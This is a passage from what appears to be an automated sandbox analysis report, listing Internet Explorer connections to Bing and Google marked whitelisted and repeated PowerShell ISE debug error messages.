3856 | iexplore.exe | 204.79.197.200:80 | www.bing.com | Microsoft Corporation | US | whitelisted |
3600 | iexplore.exe | 172.217.23.164:80 | www.google.com | Google Inc. | US | whitelisted |
3600 | iexplore.exe | 172.217.23.164:443 | www.google.com | Google Inc. | US | whitelisted |
3856 | iexplore.exe | 172.217.23.164:443 | www.google.com | Google Inc. | US | whitelisted |
Domain | IP | Reputation |
---|---|---|
www.google.com | | whitelisted |
www.bing.com | | whitelisted |
Process | Message |
---|---|
PowerShell_ISE.exe | *** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302 |
PowerShell_ISE.exe | *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144 |
PowerShell_ISE.exe | *** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302 |
PowerShell_ISE.exe | *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144 |
PowerShell_ISE.exe | *** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302 |
PowerShell_ISE.exe | *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144 |
PowerShell_ISE.exe | *** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302 |
PowerShell_ISE.exe | *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144 |
PowerShell_ISE.exe | *** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302 |
PowerShell_ISE.exe | *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144 |